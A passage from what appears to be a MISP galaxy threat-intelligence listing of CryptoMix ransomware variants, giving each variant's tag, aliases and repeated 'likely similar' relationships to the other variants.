similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-MOLE66

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-MOLE66"

View relationships graph

CryptoMix-MOLE66 has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Noob

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Noob"

View relationships graph

CryptoMix-Noob has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Ogonia

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Ogonia"

View relationships graph

CryptoMix-Ogonia has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Pirate

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Pirate"

View relationships graph

CryptoMix-Pirate has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Revenge

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Revenge"

View relationships graph

CryptoMix-Revenge has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-SERVER

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-SERVER"

Cryptomix-SERVER is also known as:

SERVER Cryptomix

View relationships graph

Cryptomix-SERVER has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Shark

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Shark"

CryptoMix-Shark is also known as:

Shark CryptoMix

View relationships graph

CryptoMix-Shark has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-System

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-System"

CryptoMix-System is also known as:

System CryptoMix

View relationships graph

CryptoMix-System has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Tastylock

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Tastylock"

CryptoMix-Tastylock is also known as:

Tastylock CryptoMix

View relationships graph

CryptoMix-Tastylock has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Test

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Test"

CryptoMix-Test is also known as:

Test CryptoMix

View relationships graph

CryptoMix-Test has relationships with:

similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Wallet

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Wallet"

View relationships graph

CryptoMix-Wallet has relationships with:

similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-WORK

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-WORK"

Cryptomix-WORK is also known as:

WORK CryptoMix

View relationships graph

Cryptomix-WORK has relationships with:

similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
